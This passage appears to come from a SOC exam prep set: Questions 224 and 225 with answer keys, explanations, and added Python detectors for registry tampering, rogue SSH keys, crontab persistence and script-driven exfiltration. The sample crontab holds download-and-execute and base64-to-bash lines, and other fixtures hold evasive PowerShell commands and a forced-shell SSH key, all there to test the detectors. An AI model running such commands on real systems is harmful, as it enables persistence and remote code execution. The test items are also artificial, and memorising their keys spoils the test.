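     "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "UtcTime": "2024-03-12 14:05:02.000", "User": r"NT AUTHORITY\SYSTEM",
     "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\CachedLogonsCount",
     "Details": "DWORD (0x0000000A)"},
    {"EventID": 13, "UtcTime": "2024-03-12 02:18:01.550", "User": r"CORP\alice",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKCU\Software\Classes\Local Settings\MuiCache\1A\52C64B7E\LanguageList",
     "Details": "en-US"},
]


def is_off_hours(utc_time, start=7, end=19):
    """Sysmon timestamps are UTC; shift to site time and test the business window."""
    local = datetime.strptime(utc_time, "%Y-%m-%d %H:%M:%S.%f") + timedelta(hours=SITE_UTC_OFFSET)
    return not (start <= local.hour < end)


def classify(event):
    """Score one Event 13 record; None when it does not touch a watched value."""
    if event.get("EventID") != 13:
        return None
    target = event["TargetObject"]
    what = next((w for path, w in WATCHLIST.items() if path.lower() == target.lower()), None)
    if what is None:
        return None
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    score, reasons = 1, [what]          # any write to a watched value deserves a look
    if image in SCRIPT_HOSTS:
        # Group Policy applies these values from svchost.exe, not from a script host.
        score, reasons = score + 2, reasons + [f"written by {image}"]
    if is_off_hours(event["UtcTime"]):
        score, reasons = score + 1, reasons + ["off-hours"]
    return {"score": score, "reasons": reasons, "user": event["User"],
            "target": target, "details": event["Details"]}


def triage(events, threshold=3):
    """Return watched-value writes at or above the threshold, worst first."""
    hits = [c for c in map(classify, events) if c and c["score"] >= threshold]
    return sorted(hits, key=lambda h: -h["score"])


if __name__ == "__main__":
    for hit in triage(EVENTS):
        print(hit["score"], hit["user"], hit["target"], hit["details"], "; ".join(hit["reasons"]))
```

The watchlist matches on the value regardless of the direction of the change: the scenario mentions disabling credential caching, but the same values are just as often turned the other way (for example enabling WDigest plaintext storage), and either direction from a script host during off-hours warrants the same response.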
Question 224
A SOC analyst detects Linux endpoints executing scripts attempting to create unauthorized SSH keys, modify login configurations, and schedule cron jobs for persistence during off-hours. The scripts are undocumented and run with elevated privileges. What is the most likely threat, and what should the SOC do first?
A) Routine SSH configuration; allow activity.
B) Malware attempting persistence, unauthorized access, and privilege escalation; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured SSH policies; update configuration.
D) User testing; verify with IT.
Answer: B)
Explanation:
Option A assumes a routine SSH configuration. Legitimate SSH changes are scheduled, documented, and performed using approved tools. Creating unauthorized SSH keys, modifying login configurations, and scheduling cron jobs via undocumented scripts during off-hours indicates anomalous activity. Allowing this could enable malware to persist, gain unauthorized access, escalate privileges, and compromise sensitive systems. Routine SSH configuration is predictable, auditable, and follows change management procedures, unlike unauthorized scripts.
Option B is correct. Malware often targets SSH keys and login mechanisms to maintain persistent access, escalate privileges, and enable remote control. Indicators include off-hours execution, elevated privileges, execution by undocumented scripts, and unauthorized modifications to SSH configurations and cron jobs. Immediate SOC response involves isolating affected endpoints to prevent further compromise, capturing memory and logs for forensic analysis, and analyzing scripts to determine malware behavior. Remediation includes removing unauthorized SSH keys, restoring login configurations, cleaning endpoints, updating monitoring rules, and auditing similar systems. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and strengthens threat intelligence. Ignoring this activity allows malware to persist, escalate privileges, maintain unauthorized access, and compromise sensitive systems.
Option C assumes misconfigured SSH policies. Misconfigurations generally cause predictable authentication failures or failed logins and do not explain off-hours execution of undocumented scripts that create keys and cron jobs. Treating this as benign risks persistent malware activity, unauthorized access, and system compromise.
Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours undocumented scripts modifying SSH configurations are inconsistent with legitimate testing. Misclassification risks persistent malware activity, privilege escalation, and endpoint compromise.
Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining endpoint security, system integrity, and regulatory compliance.
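The Python below is an added worked example for this question, not code from the original explanation or from OpenSSH. It performs the two checks that confirm the persistence described above on an isolated Linux endpoint: every key in authorized_keys is fingerprinted (SHA256, in the format ssh-keygen prints) and compared with an approved inventory, with forced-command options called out separately, and each crontab line is matched against common persistence patterns (download-and-execute pipes, base64-decoded commands, execution from volatile or dot-directories, @reboot entries). The key blobs are constructed placeholders of the right base64 length, not real keys; the inventory, the authorized_keys file, and the crontab are likewise constructed.

```python
import base64
import hashlib
import re
import shlex

KEY_TYPES = {"ssh-ed25519", "ssh-rsa", "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384",
             "ecdsa-sha2-nistp521", "ssh-dss", "sk-ssh-ed25519@openssh.com"}

# Constructed key blobs: valid base64 of a plausible length but placeholder
# bytes, so they hash like real keys without being usable ones.
ALICE_BLOB = "AAAAC3NzaC1lZDI1NTE5AAAAI" + "KEYalice".ljust(43, "0")
ROGUE_BLOB = "AAAAC3NzaC1lZDI1NTE5AAAAI" + "KEYrogue".ljust(43, "0")
ROGUE2_BLOB = "AAAAB3NzaC1yc2EAAAADAQABAAAB" + "KEYrogue2".ljust(44, "0")

# Hypothetical inventory of approved public keys (owner -> blob); the allowlist
# used for triage is derived from it as SHA256 fingerprints.
APPROVED_PUBKEYS = {"alice@laptop": ALICE_BLOB}

SAMPLE_AUTHORIZED_KEYS = f"""\
# managed by configuration management
ssh-ed25519 {ALICE_BLOB} alice@laptop
ssh-ed25519 {ROGUE_BLOB}
command="/bin/sh" ssh-rsa {ROGUE2_BLOB} update
"""

SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -s http://198.51.100.7/u.sh | sh
@reboot /dev/shm/.x/agent
30 1 * * * echo aGVsbG8= | base64 -d | bash
"""

CRON_PATTERNS = [
    ("download-and-execute", re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|python\d*)\b")),
    ("encoded-command", re.compile(r"\bbase64\s+(-d|--decode)\b")),
    ("volatile-path", re.compile(r"(^|[\s=])/(dev/shm|tmp|var/tmp)/")),
    ("hidden-path", re.compile(r"/\.[^/\s]+/")),        # something run from a dot-directory
    ("reboot-persistence", re.compile(r"^@reboot\b")),
]


def fingerprint(blob_b64):
    """OpenSSH-style SHA256 fingerprint (unpadded base64) of a public key blob."""
    raw = base64.b64decode(blob_b64, validate=True)
    return "SHA256:" + base64.b64encode(hashlib.sha256(raw).digest()).decode().rstrip("=")


APPROVED = {fingerprint(blob): owner for owner, blob in APPROVED_PUBKEYS.items()}


def parse_authorized_keys(text):
    """Split each key line into options, key type, blob and comment."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        try:
            tokens = shlex.split(line)        # keeps quoted options such as command="..." together
        except ValueError:
            tokens = []
        idx = next((i for i, t in enumerate(tokens) if t in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(tokens):
            entries.append({"error": "unparsed", "line": line})
            continue
        entries.append({"options": " ".join(tokens[:idx]), "type": tokens[idx],
                        "blob": tokens[idx + 1], "comment": " ".join(tokens[idx + 2:])})
    return entries


def key_findings(text, approved=APPROVED):
    """Return (tag, detail) for keys that should not be on the host."""
    findings = []
    for e in parse_authorized_keys(text):
        if "error" in e:
            findings.append(("unparsed", e["line"]))
            continue
        try:
            fp = fingerprint(e["blob"])
        except ValueError:
            findings.append(("malformed-key", e["comment"]))
            continue
        if fp not in approved:
            findings.append(("unknown-key", fp))
        if "command=" in e["options"]:
            findings.append(("forced-command", e["options"]))   # planted key with its own entry point
    return findings


def cron_findings(text):
    """Return ([tags], line) for crontab lines matching persistence patterns."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tags = [tag for tag, rx in CRON_PATTERNS if rx.search(line)]
        if tags:
            findings.append((tags, line))
    return findings


if __name__ == "__main__":
    for finding in key_findings(SAMPLE_AUTHORIZED_KEYS) + cron_findings(SAMPLE_CRONTAB):
        print(*finding)
```

Comparing fingerprints rather than raw lines means a key that was re-added with a different comment or with options stripped still matches the inventory, while anything not in the inventory is an unknown key regardless of how plausible its comment looks. Per-user crontabs, /etc/cron.d, and systemd timers all need the same pass; this example only covers the crontab format.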
Question 225
A SOC analyst observes Windows endpoints executing scripts attempting to exfiltrate source code repositories, API keys, and software build configurations to unknown external servers during off-hours. The scripts are unsigned and run with elevated privileges. What is the most likely threat, and what should the SOC do first?
A) Routine code backup; allow activity.
B) Malware performing intellectual property theft and data exfiltration; isolate endpoints, capture traffic, and analyze scripts.
C) Misconfigured backup policies; update configuration.
D) User testing; notify the development team.
Answer: B)
Explanation:
Option A assumes routine code backups. Legitimate backups are scheduled, documented, and executed using approved tools targeting authorized storage locations. Exfiltration of source code, API keys, and build configurations off-hours via unsigned scripts indicates anomalous activity. Allowing this could enable malware to steal intellectual property, persist undetected, escalate privileges, and compromise enterprise software integrity. Routine backups are predictable, auditable, and performed under compliance policies, unlike off-hours unauthorized activity targeting unknown destinations.
Option B is correct. Malware frequently targets intellectual property, such as source code repositories and API keys, to steal proprietary information, enable software supply chain attacks, or facilitate corporate espionage. Indicators include off-hours execution, elevated privileges, execution by unsigned scripts, and communication with unknown external servers. Immediate SOC response involves isolating affected endpoints to prevent further exfiltration, capturing network traffic for forensic analysis, and analyzing scripts to determine the scope of stolen data. Remediation includes cleaning endpoints, blocking malicious external servers, resetting compromised credentials, updating monitoring rules for sensitive data exports, and auditing source code repositories. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and strengthens threat intelligence. Ignoring this activity allows malware to persist, compromise proprietary information, facilitate unauthorized access, and potentially damage enterprise operations.
Option C assumes that unusual off-hours activity, specifically the execution of unsigned scripts exporting sensitive source code, can be attributed to misconfigured backup policies. Backup policies in enterprise environments are critical for maintaining data integrity and ensuring business continuity. Misconfigurations in backup systems—such as incorrect scheduling, misapplied retention settings, or improperly configured backup paths—typically result in predictable and traceable outcomes. Common manifestations of backup misconfigurations include missed backups, failed backup jobs, alerts regarding inaccessible files or directories, or incomplete snapshots. These outcomes are generally limited in scope, affecting particular servers, directories, or datasets, and are easily identifiable through routine monitoring and logging mechanisms.
In contrast, the off-hours execution of unsigned scripts that export sensitive source code is inconsistent with the behavior expected from backup misconfigurations. Backup errors or misconfigurations do not autonomously execute scripts, perform data exports outside scheduled windows, or bypass existing security controls. Unsigned scripts indicate that the activity is not originating from authorized system processes or verified administrative tools. The deliberate nature of such scripts, combined with their off-hours execution, strongly suggests the presence of malicious actors attempting to extract intellectual property or establish a persistent foothold within the network. Treating such activity as benign under the assumption of backup misconfiguration introduces substantial risks, including the possibility of ongoing malware activity, theft of proprietary code, and broader system compromise.
Option D assumes that off-hours export of source code could be part of legitimate user testing. While testing is a necessary and routine part of enterprise operations, it is typically structured, scheduled, and well-documented. Approved testing processes involve known endpoints, validated scripts, and controlled environments. Testing is performed to validate system functionality, software behavior, or security controls, and generally does not involve unsupervised data exports or access to sensitive production repositories. Off-hours execution of undocumented scripts targeting source code is inconsistent with these principles, as legitimate testing would occur in line with approved schedules and established operational procedures. The lack of documentation, the timing of execution, and the focus on sensitive intellectual property indicate activity outside the bounds of legitimate testing.
Misclassifying this activity as benign poses significant security and operational risks. Persistent malware or unauthorized actors can leverage unsigned scripts to export sensitive source code, which may include proprietary algorithms, trade secrets, or other intellectual property critical to the organization’s competitive advantage. Theft of such data not only jeopardizes business operations but can also lead to regulatory and compliance violations, particularly if the source code contains data covered under privacy regulations or contractual obligations. Persistent malware operating through these scripts may further establish backdoors, modify system configurations, or create additional accounts, allowing attackers to maintain access and move laterally across systems. Off-hours activity is particularly concerning, as it exploits periods of reduced monitoring and oversight, increasing the likelihood that malicious actions go undetected.
Proper response requires careful investigation, verification, and monitoring. Security teams must examine logs of script execution, file access, and network activity to determine the origin and intent of off-hours operations. Endpoint and repository forensics can identify whether scripts are authorized administrative tools or unauthorized malicious activity. Behavioral analysis and anomaly detection can help distinguish between routine operational processes and potentially malicious behavior. Additionally, correlating activity with known testing schedules and approved backup jobs is essential to identify deviations from expected behavior. Any undocumented off-hours script interacting with sensitive source code should be treated as suspicious until fully verified.
While misconfigured backup policies or legitimate user testing may explain minor anomalies, neither scenario accounts for off-hours execution of unsigned scripts exporting sensitive source code. Such activity is inconsistent with benign operational errors or approved testing procedures and strongly indicates malicious intent. Misclassification risks persistent malware presence, intellectual property theft, regulatory violations, and broader system compromise. Accurate verification, monitoring, and timely remediation are critical to identify unauthorized scripts, protect sensitive data, and ensure operational integrity. By maintaining strict oversight of backup processes, monitoring off-hours activity, and enforcing documentation and approval requirements for all scripts and testing procedures, organizations can safeguard intellectual property, reduce the risk of compromise, and mitigate the potential impact of malicious activity.
Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining endpoint security, intellectual property protection, and regulatory compliance. It also prevents potential further attacks leveraging stolen source code or API credentials.
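The exfiltration scenarios in Question 221 (financial spreadsheets and ERP configuration) and Question 225 (source code, API keys, build configuration) call for the same detection, so the following Python is one added worked example serving both; it is not from the original explanations or from any vendor product. It joins Sysmon Event ID 3 (network connection) records to the Event ID 1 (process create) record of the process that opened them, drops internal and sanctioned destinations, and keeps connections whose parent process looks like the page's elevated off-hours script host: a scripting host image, High or System integrity, evasive PowerShell switches, and execution outside business hours. The event records, corporate address ranges, allowlisted destination, and site time-zone offset are constructed assumptions. Sysmon Event 1 does not record whether a script file was signed, so the example uses the command-line switches as a proxy; the resulting destination IPs are the pivot into the traffic capture the explanation recommends.

```python
import ipaddress
from datetime import datetime, timedelta

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Hypothetical corporate address space and sanctioned external destinations
# (backup target, SaaS endpoints) maintained by the SOC.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
KNOWN_DESTINATIONS = {"203.0.113.10"}
SITE_UTC_OFFSET = -5   # assumption: the site's local time zone, for the off-hours check
EVASIVE_FLAGS = ("-executionpolicy bypass", "-ep bypass", "-enc", "-encodedcommand",
                 "-w hidden", "-windowstyle hidden")

# Constructed records shaped like Sysmon Event ID 1 (process create) and
# Event ID 3 (network connection); not real telemetry.
EVENTS = [
    {"EventID": 1, "UtcTime": "2024-03-12 03:02:10.000", "ProcessGuid": "{A1}", "User": r"CORP\jsmith",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "IntegrityLevel": "High",
     "CommandLine": r"powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -File C:\Users\Public\sync.ps1"},
    {"EventID": 3, "UtcTime": "2024-03-12 03:02:11.050", "ProcessGuid": "{A1}", "Initiated": "true",
     "DestinationIp": "10.20.0.5", "DestinationPort": 445},       # reading the file share
    {"EventID": 3, "UtcTime": "2024-03-12 03:02:12.400", "ProcessGuid": "{A1}", "Initiated": "true",
     "DestinationIp": "198.51.100.23", "DestinationPort": 443},   # unknown external server
    {"EventID": 1, "UtcTime": "2024-03-12 14:00:00.000", "ProcessGuid": "{B2}", "User": r"CORP\svc_backup",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "IntegrityLevel": "High",
     "CommandLine": r"powershell.exe -File C:\ProgramData\Backup\nightly.ps1"},
    {"EventID": 3, "UtcTime": "2024-03-12 14:00:05.000", "ProcessGuid": "{B2}", "Initiated": "true",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},    # sanctioned backup target
]


def local_hour(utc_time):
    """Sysmon timestamps are UTC; return the hour in site local time."""
    ts = datetime.strptime(utc_time, "%Y-%m-%d %H:%M:%S.%f") + timedelta(hours=SITE_UTC_OFFSET)
    return ts.hour


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def process_reasons(proc):
    """Why a process-create record resembles the elevated off-hours script in the scenario."""
    image = proc["Image"].rsplit("\\", 1)[-1].lower()
    cmd = proc.get("CommandLine", "").lower()
    reasons = []
    if image in SCRIPT_HOSTS:
        reasons.append("script host")
    if proc.get("IntegrityLevel") in ("High", "System"):
        reasons.append("elevated")
    if any(flag in cmd for flag in EVASIVE_FLAGS):
        reasons.append("evasive command line")
    if not 7 <= local_hour(proc["UtcTime"]) < 19:
        reasons.append("off-hours")
    return reasons


def find_exfil_candidates(events, min_reasons=3):
    """Join outbound connections to their creating process and keep the suspicious ones."""
    procs = {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}
    hits = []
    for e in events:
        if e["EventID"] != 3 or str(e.get("Initiated", "")).lower() != "true":
            continue
        dst = e["DestinationIp"]
        if is_internal(dst) or dst in KNOWN_DESTINATIONS:
            continue   # lateral or sanctioned traffic is a different hunt
        proc = procs.get(e["ProcessGuid"])
        if proc is None:
            continue   # process create is outside this window; pull it from the endpoint
        reasons = process_reasons(proc)
        if len(reasons) >= min_reasons:
            hits.append({"guid": proc["ProcessGuid"], "user": proc["User"],
                         "destination": f"{dst}:{e['DestinationPort']}",
                         "command": proc["CommandLine"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_exfil_candidates(EVENTS):
        print(hit["user"], hit["destination"], "; ".join(hit["reasons"]))
        print("   ", hit["command"])
```

The scheduled backup job survives the filter on two counts, its destination is allowlisted and it runs during business hours, which is exactly the distinction the explanations for options A and C draw between predictable, documented activity and an unsigned script pushing data to an unknown server at night. Sysmon connection records carry no byte counts, so volume has to come from the proxy, firewall, or NetFlow side once the destination is known.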